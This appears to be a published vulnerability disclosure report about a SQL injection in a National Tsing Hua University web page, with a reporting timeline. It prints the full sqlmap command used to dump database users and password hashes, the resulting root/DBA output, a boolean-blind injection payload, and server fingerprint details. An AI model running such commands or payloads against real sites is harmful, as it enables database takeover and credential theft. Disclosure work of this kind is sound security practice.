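2015-12-03: Details reported to the vendor; awaiting vendor response
2015-12-05: Vendor confirmed; details disclosed to the vendor only
2015-12-15: Details disclosed to core white hats and experts in related fields
2015-12-25: Details disclosed to regular white hats
2016-01-04: Details disclosed to trainee white hats
2016-01-19: Details disclosed to the public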
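SQL injection vulnerability in a National Tsing Hua University site (DBA privileges + root password + system administration passwords + a large number of plaintext user passwords)
URL: http://**.**.**.**/aviso/list/available_book.php?class=LA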
$ python sqlmap.py -u "http://**.**.**.**/aviso/list/available_book.php?class=LA" -p class --technique=B --random-agent --batch --no-cast --current-user --is-dba --users --passwords --count --search -C pass
current user: 'root@localhost'
current user is DBA: True
database management system users [14]:
[*] ''@'**.**.**.**'
[*] ''@'localhost'
[*] 'bplan'@'**.**.**.**'
[*] 'bplan'@'**.**.**.**'
[*] 'ideal'@'localhost'
[*] 'project'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'shadow'@'localhost'
[*] 'tcs'@'%'
[*] 'tcs'@'**.**.**.**'
[*] 'tcs'@'localhost'
---
Parameter: class (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: class=LA' AND 8567=8567#
---
web server operating system: FreeBSD
web application technology: PHP 4.4.9, Apache 2.2.18
back-end DBMS: MySQL >= 5.0.0
Deploy a WAF.
Severity: High
Vulnerability Rank: 18
Confirmed: 2015-12-05 22:37
Thank you for the report.
None yet